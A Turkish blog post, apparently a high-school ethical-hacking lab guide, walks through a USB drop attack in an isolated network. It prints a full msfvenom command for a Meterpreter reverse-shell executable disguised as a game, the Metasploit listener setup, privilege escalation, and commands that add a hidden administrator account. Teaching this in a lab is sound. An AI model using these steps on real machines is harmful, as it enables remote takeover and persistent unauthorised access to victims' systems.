Msfvenom ile Reverse Shell ve USB Drop Saldırısı

-

Etik Hackerlık ve Sızma Testi Laboratuvar Uygulaması

Hazırlayan: Nuri TIRAŞ


  

Bu eğitim makalesi, 11. sınıf bilgi teknolojileri öğrencilerinin siber güvenlik "Büyük Final" tatbikatında izole ağ laboratuvarlarında kullanılmak üzere, güvenlik açıklarının nasıl tespit edileceği ve zararlı yazılımların çalışma prensiplerinin nasıl analiz edileceği konularına odaklanmaktadır. Ticaret ve Sanayi Odası Ticaret Mesleki ve Teknik Anadolu Lisesi altyapısında kurulabilecek bu senaryo, öğrencilerin ofansif ve defansif siber güvenlik yeteneklerini geliştirmeleri için ideal bir uygulamadır.



Laboratuvar Ortamının Hazırlanması

 

Etik hacking ve sızma testi uygulamalarının güvenli bir şekilde gerçekleştirilebilmesi için tamamen izole bir ağ ortamı (Host-Only Network) şarttır. Bu laboratuvar çalışmasında, saldırgan (attacker) makine olarak Kali Linux, hedef makine olarak ise Windows Server 2016 (Masaüstü Deneyimi - 64-bit) kullanılmaktadır.

  • Ayarları: Her iki sanal makinenin de adaptörleri sadece sunucu ve istemci makinelerin birbirini görebileceği şekilde ayarlanmalıdır. Bu durum testlerin dış ağlara taşmasını engeller.

  • Güvenlik Duvarı: Eğitim senaryosunun başlangıcında, üretilecek payload'un ilk aşamada başarıyla çalışabilmesi için hedef makinedeki Windows Defender ve güvenlik duvarı (Firewall) devre dışı bırakılır.

 

Msfvenom ile Payload (Zararlı Yazılım) Üretimi

 

Oluşturulacak senaryo bir USB Drop (USB Bırakma) saldırısıdır. Saldırgan, içine zararlı bir yazılım gizlediği USB belleği otopark gibi hedef kitlenin kolayca bulabileceği bir yere bırakır. Kurban USB belleği alıp bilgisayarına taktığında ve içindeki dosyayı çalıştırdığında, saldırgana "Reverse Shell" (Tersine Kabuk) bağlantısı açılır.


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.105 LPORT=4444 -f exe > /root/Desktop/flash_soccer.exe 


Komutun bileşenleri:

  • -p windows/x64/meterpreter/reverse_tcp: 64-bit Windows mimarisi için Meterpreter reverse TCP payload'u.

  • LHOST: Kali Linux (Saldırgan) makinenin IP adresi.

  • LPORT: Dinleme yapılacak port (örneğin; 4444).

  • -f exe: Çıktı formatının Windows çalıştırılabilir dosyası (.exe) olması.

  • > .../flash_soccer.exe: Dosyanın oyun izlenimi verecek şekilde kaydedilmesi.

 

Dinleyici (Handler) Kurulumu

 

Hedef makine zararlı dosyayı çalıştırdığında gelecek bağlantıyı yakalamak için Kali Linux üzerinde Metasploit Framework kullanılarak bir dinleyici oluşturulur.

 

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.56.105

set LPORT 4444

run

  

run komutu girildikten sonra sistem hedef makineden gelecek olan reverse TCP bağlantısını beklemeye başlar.

 

USB Drop Simülasyonu ve Sızma

 

Kali'de üretilen flash_soccer.exe dosyası bir USB belleğe kopyalanır. Simülasyon gereği, USB bellek hedef Windows Server 2016 makinesine takılır. Hedef kullanıcı, oyun zannettiği yazılıma çift tıkladığında,

Metasploit ekranında Sending stage... Meterpreter session 1 opened mesajı belirir. Bu aşamadan itibaren hedef bilgisayar tamamen saldırganın kontrolü altındadır.

 

 

Sızma Sonrası Aşamalar (Post-Exploitation)

 

Meterpreter oturumu açıldıktan sonra saldırgan, sistem üzerinde çeşitli komutlar yürütebilir. Uygulamalı senaryoda test edilen komutlar şunlardır:

 

Yetki Kontrolü ve Yükseltme

 

  • getuid: Mevcut kullanıcının yetkilerini ve hangi hesapta oturum açıldığını listeler.

  • getsystem: Sistem üzerinde yetki yükseltme denemesi yapar. Başarılı olması durumunda, işletim sistemindeki en üst düzey yetki olan NT AUTHORITY\SYSTEM erişimini elde eder.

 

Komut Satırına Geçiş ve Kullanıcı Ekleme

 

Meterpreter üzerinden doğrudan Windows komut satırına (shell) geçiş yapılarak komut çalıştırılabilir. Aşağıdaki komutlar ile sisteme gizli bir yönetici hesabı eklenir:

 

shell

net user accounts Sifre123! /add

net localgroup administrators accounts /add

Bu adımlarla "accounts" adında yeni bir kullanıcı oluşturulup Yönetici (Administrator) grubuna eklenir.

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Android Telefon/Tablet Ekranını Pardus ETAP 23 Yüklü Akıllı Tahtaya Yansıtma

-
Resim
Bu eğitim, öğretmenlerin Android tablet veya telefonlarının ekranını kolayca tahta ekranına yansıtmaları için gereken tüm yöntemler ayrıntılı şekilde anlatılmaktadır. 1. Giriş Android cihazı akıllı tahtaya yansıtmanın amacı: Dersi telefondan yönetmek Mobil uygulamaları sınıfa göstermek YouTube, EBA, PDF, görsel veya kamera görüntüsünü aktarmak Kablosuz sunum yapmak Pardus ETAP 23 üzerinde yansıtma işlemi için en çok tercih edilen yöntemler: Scrcpy (USB + WiFi bağlantılı) — En stabil çözüm Third-party çözümler (TeamViewer Host, DeskScreen, Vysor vb.) Bu makalede en garantili ve ETAP 23’e en uyumlu yöntem olan Scrcpy başta olmak üzere tüm yöntemleri anlatıyoruz. 2. Scrcpy ile Yansıtma Scrcpy, Android cihazınızı yüksek kalite / düşük gecikme ile bilgisayara aktaran açık kaynaklı bir yazılımdır. Pardus ETAP 23 için mükemmel uyumludur. ✔️ 2.1. Kurulum Adım 1 — Gerekli paketleri yükle Terminali açın: sudo apt update sudo apt install scrcpy adb android-to...
Devamı

Pardus Etap 23’de Unutulmuş Etap Yetkili Parolasını Sıfırlama

-
Resim
Bu kısa eğitimde, Pardus sisteminde unutulmuş bir Etap Yetkli parolasının nasıl sıfırlanacağını öğreneceksiniz. Bu, etapadmin kullanıcısı olarak oturum açma ve yönetim görevlerini gerçekleştirme yeteneğinizi yeniden kazanmanıza yardımcı olacaktır. Öncelikle Pardus sisteminizi açın veya yeniden başlatın. Aşağıda gösterildiği gibi bir GRUB menüsüyle karşılaşacaksınız. İlk seçenekte devam edin ve sistem başlatılmadan önce klavyedeki " e " tuşuna basın. . Bu sizi aşağıda gösterilen ekrana yönlendirecektir. Aşağı kaydırın ve /boot/vmlinuz-* bölümünden önce gelen ve UUID 'yi de belirten ' linux ' ile başlayan satırı bulun.   İmleci bu satırın sonuna götürün ve ‘ ro quiet’ bölümünden hemen sonrasına getirin ve init=/bin/bash. parametresini ekleyin Ardından, kök dosya sistemini salt okunur (ro) erişim haklarıyla bağlayarak tek kullanıcı modunda önyüklemeyi etkinleştirmek için Ctrl + x tuşlarına basın. Parolayı sıfırlamak için erişim hakkını salt okunurdan okuma-ya...
Devamı

Pardus Etap 23 Yazıcı Kurulumu

-
Resim
1. CUPS Nedir? CUPS , "Common UNIX Printing System" (Yaygın UNIX Yazdırma Sistemi) kelimelerinin baş harflerinden oluşur.  Temel Görevi: Pardus gibi UNIX tabanlı işletim sistemleri için standart yazdırma sunucusudur. Bilgisayarınızdaki uygulamalardan (LibreOffice, tarayıcı vb.) gelen yazdırma isteklerini alır, bunları yazıcının anlayacağı dile (genellikle PCL veya PostScript) çevirir ve sıraya koyarak yazıcıya gönderir. Geliştirici: İlk olarak Michael Sweet tarafından geliştirildi, daha sonra Apple Inc. tarafından desteklendi ve günümüzde OpenPrinting topluluğu tarafından sürdürülüyor. Ağ Paylaşımı: CUPS'ın en güçlü yanlarından biri, bir yazıcıyı ağdaki diğer bilgisayarlara (Windows, macOS veya başka bir Linux) kolayca paylaştırabilmesidir. Yönetim Arayüzü: En karmaşık ayarları bile yapabilmenizi sağlayan, tarayıcı üzerinden çalışan yerel bir web arayüzüne sahiptir ( http://localhost:631 ). Pardus, Debian tabanlı olduğu için CUPS'ı varsayılan yazdırma sistemi ol...
Devamı